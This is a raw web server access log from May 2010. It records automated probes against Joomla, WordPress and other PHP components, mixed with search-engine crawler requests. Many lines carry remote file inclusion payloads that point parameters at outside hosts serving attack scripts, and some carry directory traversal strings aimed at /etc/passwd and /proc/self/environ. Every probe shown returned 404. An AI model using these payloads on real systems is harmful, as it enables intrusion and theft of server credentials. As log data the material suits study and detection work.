122.199.140.158 - - [02/May/2010:10:50:25 -0500] "GET /logs/access_log.1268611200%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
122.199.140.158 - - [02/May/2010:10:50:25 -0500] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
122.199.140.158 - - [02/May/2010:10:50:25 -0500] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
62.146.125.2 - - [02/May/2010:10:55:11 -0500] "GET //wp-content/plugins/wp-lytebox/main.php?pg=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 323 "-""-"
62.146.125.2 - - [02/May/2010:10:55:11 -0500] "GET //wp-content/plugins/wp-lytebox/main.php?pg=./../../../../../../../../etc/passwd HTTP/1.1" 404 323 "-""-"
80.254.110.8 - - [02/May/2010:10:55:30 -0500] "GET /logs/access_log.1261699200 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
80.254.110.8 - - [02/May/2010:10:55:30 -0500] "GET /logs/access_log.1261699200 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
77.221.130.13 - - [02/May/2010:10:55:31 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.221.130.13 - - [02/May/2010:10:55:31 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
77.221.130.13 - - [02/May/2010:10:55:31 -0500] "GET /logs/access_log.1268611200%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
189.108.172.26 - - [02/May/2010:10:56:51 -0500] "GET /logs/access_log.1268611200%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
189.108.172.26 - - [02/May/2010:10:56:51 -0500] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
189.108.172.26 - - [02/May/2010:10:56:51 -0500] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.195.112.180 - - [02/May/2010:10:57:01 -0500] "GET /logs/access_log.1161907200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.26.227.88 - - [02/May/2010:10:57:02 -0500] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.26.227.88 - - [02/May/2010:10:57:02 -0500] "GET /logs/access_log.1264723200/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0"
212.26.227.88 - - [02/May/2010:10:57:02 -0500] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
212.26.227.88 - - [02/May/2010:10:57:34 -0500] "GET /logs/access_log.1264723200/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0"
212.26.227.88 - - [02/May/2010:10:57:34 -0500] "GET /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.26.227.88 - - [02/May/2010:10:57:35 -0500] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
212.26.227.88 - - [02/May/2010:10:57:41 -0500] "GET /logs/access_log.1263168000/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0"
212.26.227.88 - - [02/May/2010:10:57:56 -0500] "GET /logs/access_log.1263168000/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.zhivagobank.ru/userfiles/d1.txt??? HTTP/1.1" 404 367 "-""Mozilla/5.0"
77.221.130.13 - - [02/May/2010:10:59:58 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
77.221.130.13 - - [02/May/2010:10:59:58 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
77.221.130.13 - - [02/May/2010:10:59:58 -0500] "GET /logs/access_log.1268611200%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
92.241.190.214 - - [02/May/2010:11:06:28 -0500] "GET /logs/access_log.1268956800//Neos_Chronos/header.php?base_folder=http://telekotravels.crvnet.es/pollphp/htaccess.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
92.241.190.214 - - [02/May/2010:11:06:28 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://telekotravels.crvnet.es/pollphp/htaccess.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
92.241.190.214 - - [02/May/2010:11:06:28 -0500] "GET //Neos_Chronos/header.php?base_folder=http://telekotravels.crvnet.es/pollphp/htaccess.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
207.46.204.184 - - [02/May/2010:11:07:24 -0500] "GET /logs/access_log.1160006400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [02/May/2010:11:07:26 -0500] "GET /logs//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:07:26 -0500] "GET /logs/access_log.1263427200//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:07:26 -0500] "GET //blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:07:26 -0500] "GET /logs/access_log.1264723200//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:07:26 -0500] "GET /logs/access_log.1262390400//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:07:30 -0500] "GET /logs/access_log.1266192000//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:07:30 -0500] "GET /logs/access_log.1264982400//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:07:30 -0500] "GET /logs/access_log.1264377600//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:07:30 -0500] "GET /logs/access_log.1264550400//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:07:30 -0500] "GET /logs/access_log.1263945600//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:07:30 -0500] "GET /logs/access_log.1263340800//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:07:30 -0500] "GET /logs/access_log.1266105600//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:07:30 -0500] "GET /logs/access_log.1263600000//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
207.46.13.98 - - [02/May/2010:11:08:25 -0500] "GET /logs/access_log.1220832000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [02/May/2010:11:08:55 -0500] "GET /logs/access_log.1262390400//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:08:55 -0500] "GET /logs//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:08:55 -0500] "GET //blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:08:55 -0500] "GET /logs/access_log.1263427200//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:08:55 -0500] "GET /logs/access_log.1264723200//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:09:01 -0500] "GET /logs/access_log.1266192000//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:09:01 -0500] "GET /logs/access_log.1264982400//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:09:01 -0500] "GET /logs/access_log.1264377600//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:09:01 -0500] "GET /logs/access_log.1264550400//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:09:01 -0500] "GET /logs/access_log.1263945600//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:09:01 -0500] "GET /logs/access_log.1263340800//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:09:01 -0500] "GET /logs/access_log.1266105600//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
222.236.47.182 - - [02/May/2010:11:09:01 -0500] "GET /logs/access_log.1263600000//blocks/block_site_map.php?root_folder_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:11:11:48 -0500] "GET /logs/access_log.1252972800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.26.122.245 - - [02/May/2010:11:14:44 -0500] "GET /logs//common/db.php?commonpath=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
72.26.122.245 - - [02/May/2010:11:14:44 -0500] "GET //common/db.php?commonpath=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.26.122.245 - - [02/May/2010:11:14:44 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
212.241.177.123 - - [02/May/2010:11:15:03 -0500] "GET /logs//common/db.php?commonpath=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
212.241.177.123 - - [02/May/2010:11:15:03 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
212.241.177.123 - - [02/May/2010:11:15:03 -0500] "GET //common/db.php?commonpath=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
193.105.206.194 - - [02/May/2010:11:15:16 -0500] "GET //common/db.php?commonpath=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
193.105.206.194 - - [02/May/2010:11:15:16 -0500] "GET /logs//common/db.php?commonpath=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
193.105.206.194 - - [02/May/2010:11:15:16 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
200.175.239.226 - - [02/May/2010:11:18:49 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
200.175.239.226 - - [02/May/2010:11:18:49 -0500] "GET /logs//common/db.php?commonpath=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
200.175.239.226 - - [02/May/2010:11:18:49 -0500] "GET //common/db.php?commonpath=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.26.122.245 - - [02/May/2010:11:19:34 -0500] "GET //common/db.php?commonpath=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.26.122.245 - - [02/May/2010:11:19:34 -0500] "GET /logs//common/db.php?commonpath=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
72.26.122.245 - - [02/May/2010:11:19:34 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
62.146.125.2 - - [02/May/2010:11:20:49 -0500] "GET //components/com_rwcards/captcha/captcha_image.php?img=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 333 "-""-"
62.146.125.2 - - [02/May/2010:11:20:49 -0500] "GET //components/com_rwcards/captcha/captcha_image.php?img=./../../../../../../../../etc/passwd HTTP/1.1" 404 333 "-""-"
72.26.122.245 - - [02/May/2010:11:21:35 -0500] "GET //common/db.php?commonpath=http://www.miranda.gov.ve/ceplacopp/logs/cgi???? HTTP/1.1" 404 298 "-""libwww-perl/5.826"
72.26.122.245 - - [02/May/2010:11:21:35 -0500] "GET /logs//common/db.php?commonpath=http://www.miranda.gov.ve/ceplacopp/logs/cgi???? HTTP/1.1" 404 303 "-""libwww-perl/5.826"
72.26.122.245 - - [02/May/2010:11:21:35 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://www.miranda.gov.ve/ceplacopp/logs/cgi???? HTTP/1.1" 404 325 "-""libwww-perl/5.826"
87.250.255.243 - - [02/May/2010:11:28:27 -0500] "GET /logs/access_log.1257033600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.73.226.225 - - [02/May/2010:11:30:19 -0500] "GET /logs/access_log.1270598400/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
217.73.226.225 - - [02/May/2010:11:30:19 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.73.226.225 - - [02/May/2010:11:30:20 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
78.110.50.119 - - [02/May/2010:11:35:38 -0500] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.manosdelalma.cl/help/ts???? HTTP/1.1" 404 330 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.110.50.119 - - [02/May/2010:11:35:38 -0500] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.manosdelalma.cl/help/ts???? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
67.218.116.134 - - [02/May/2010:11:36:27 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.167.65.30 - - [02/May/2010:11:36:33 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:11:36:33 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:11:36:33 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.218.116.131 - - [02/May/2010:11:41:54 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.167.65.30 - - [02/May/2010:11:42:30 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:11:42:30 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:11:42:30 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
164.77.228.200 - - [02/May/2010:11:42:49 -0500] "GET /logs///aedatingCMS.php?dir[inc]=http://www.intoy1004.co.kr/bbs/README.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
164.77.228.200 - - [02/May/2010:11:42:49 -0500] "GET ///aedatingCMS.php?dir[inc]=http://www.intoy1004.co.kr/bbs/README.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
207.46.199.40 - - [02/May/2010:11:45:25 -0500] "GET /logs/access_log.1166140800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [02/May/2010:11:45:31 -0500] "GET /logs/access_log.1219449600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.167.65.30 - - [02/May/2010:11:48:15 -0500] "GET /logs/access_log.1270684800//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:11:48:15 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:11:48:15 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:11:48:19 -0500] "GET /logs/access_log.1216166400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.50 - - [02/May/2010:11:48:31 -0500] "GET /logs/access_log.1162598400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.243 - - [02/May/2010:11:48:54 -0500] "GET /logs/access_log.1201219200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.218.116.130 - - [02/May/2010:11:49:21 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.167.65.30 - - [02/May/2010:11:50:31 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:11:50:31 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:11:50:31 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:11:51:49 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:11:51:49 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:11:51:49 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.129.119.14 - - [02/May/2010:11:52:29 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.43 - - [02/May/2010:11:52:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
210.245.85.109 - - [02/May/2010:11:54:49 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
210.245.85.109 - - [02/May/2010:11:54:49 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
210.245.85.109 - - [02/May/2010:11:54:49 -0500] "GET //inc/header.php/step_one.php?server_inc=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.129.119.44 - - [02/May/2010:11:55:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.167.65.30 - - [02/May/2010:11:56:20 -0500] "GET /logs/access_log.1270684800%20%20//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:11:56:20 -0500] "GET //common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.167.65.30 - - [02/May/2010:11:56:20 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
67.218.116.166 - - [02/May/2010:11:57:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
78.110.50.119 - - [02/May/2010:12:00:07 -0500] "GET //common/db.php?commonpath=http://www.manosdelalma.cl/help/ts???? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
78.110.50.119 - - [02/May/2010:12:00:07 -0500] "GET /logs//common/db.php?commonpath=http://www.manosdelalma.cl/help/ts???? HTTP/1.1" 404 303 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
67.218.116.164 - - [02/May/2010:12:00:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.199.188 - - [02/May/2010:12:00:51 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.228 - - [02/May/2010:12:02:25 -0500] "GET /logs/access_log.1170460800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
188.116.32.40 - - [02/May/2010:12:03:35 -0500] "GET /logs//common/db.php?commonpath=http://www.cornerstonelearninggroup.net/cms/mambots/id.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
